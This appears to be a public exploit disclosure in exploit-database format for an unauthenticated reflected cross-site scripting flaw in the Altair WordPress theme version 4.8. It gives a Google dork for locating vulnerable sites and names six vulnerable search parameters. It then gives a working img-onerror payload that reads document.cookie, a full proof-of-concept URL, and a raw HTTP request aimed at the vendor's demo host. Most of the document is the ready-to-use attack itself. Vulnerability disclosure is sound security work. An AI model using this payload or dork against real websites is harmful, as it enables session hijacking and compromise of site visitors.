[+] :: Exploit Title: Altair WordPress theme v4.8 - Unauthenticated Reflected XSS
[+] :: Google Dork: inurl:/wp-content/themes/altair/
[+] :: Date: 2020-09-10
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: ThemeGoods [ https://themegoods.com ]
[+] :: Software Version: 4.8
[+] :: Software Link: https://themeforest.net/item/tour-travel-agency-altair-theme/9318575
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79
[i] :: Info:
An Unauthenticated Reflected XSS vulnerability was discovered in the Altair theme v4.8 for WordPress.
Vulnerable parameters: keyword, start_date, start_date_raw, end_date, end_date_raw, budget.
[$] :: Payload:
"><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);>
[!] :: PoC:
https://themes.themegoods.com/altair/demo/tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&budget=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E
[!] :: PoC (Burp Suite):
GET /altair/demo/tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&budget=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E HTTP/1.1
Host: themes.themegoods.com
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi
